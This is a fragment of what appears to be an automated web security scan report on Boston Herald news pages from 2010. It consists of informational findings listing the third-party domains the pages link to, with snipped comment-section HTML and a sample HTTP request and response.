<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818740,5,0);" ><img id="thumb_up_1818740" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818740,1,0);"><img id="thumb_down_1818740" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818740, 'DotWeddingCrash');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments&cnum=1&at_comment=1818740#cnum1818740"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818740','/news/regional/view.bg?articleid=1294599&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818859,5,0);" ><img id="thumb_up_1818859" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818859,1,0);"><img id="thumb_down_1818859" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818859, 'onyourmark');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments&cnum=1&at_comment=1818859#cnum1818859"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818859','/news/regional/view.bg?articleid=1294599&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818944,5,0);" ><img id="thumb_up_1818944" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818944,1,0);"><img id="thumb_down_1818944" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818944, 'LargoBarbara');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments&cnum=1&at_comment=1818944#cnum1818944"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818944','/news/regional/view.bg?articleid=1294599&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1819073,5,0);" ><img id="thumb_up_1819073" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1819073,1,0);"><img id="thumb_down_1819073" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1819073, 'Weyman');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments&cnum=1&at_comment=1819073#cnum1819073"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1819073','/news/regional/view.bg?articleid=1294599&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1819147,5,0);" ><img id="thumb_up_1819147" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1819147,1,0);"><img id="thumb_down_1819147" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1819147, 'leaveMyHuntalone');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments&cnum=1&at_comment=1819147#cnum1819147"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1819147','/news/regional/view.bg?articleid=1294599&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1819169,5,0);" ><img id="thumb_up_1819169" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1819169,1,0);"><img id="thumb_down_1819169" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1819169, 'hoopfan');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments&cnum=1&at_comment=1819169#cnum1819169"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1819169','/news/regional/view.bg?articleid=1294599&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1819244,5,0);" ><img id="thumb_up_1819244" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1819244,1,0);"><img id="thumb_down_1819244" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1819244, 'derfcam');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments&cnum=1&at_comment=1819244#cnum1819244"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1819244','/news/regional/view.bg?articleid=1294599&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
</a>  |  <a class="LinksRedNone" style="text-decoration:underline" href="http://www.heraldmedia.com/privacy.html" target="_new">Privacy commitment</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(29) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/3b0ba2_church_11072010.jpg" alt="DEFENDER: Kay Herlihy, vice chairman..." /></div>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1294599%26format%3Dcomments%26srvc%3Dnews%26position%3D2&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.34. http://bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/regional/view.bg?articleid=1294599&srvc=news&position=2

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20101107church-sale_plan_causes_beef%2Fsrvc%3Dhome%26position%3D3&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101106/3b0ba2_church_11072010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /news/regional/view.bg?articleid=1294599&srvc=news&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:13:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20101107church-sale_plan_causes_beef%2Fsrvc%3Dhome%26position%3D3&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Church-sale plan causes beef');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294599&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(29) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/3b0ba2_church_11072010.jpg" alt="DEFENDER: Kay Herlihy, vice chairman..." /></div>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20101107church-sale_plan_causes_beef%2Fsrvc%3Dhome%26position%3D3&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.35. http://bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/regional/view.bg?articleid=1294586&position=1

The response contains the following links to other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level%2Fsrvc%3Dhome%26position%3D2&c5=&c6=&c15=
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle1&companion=&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
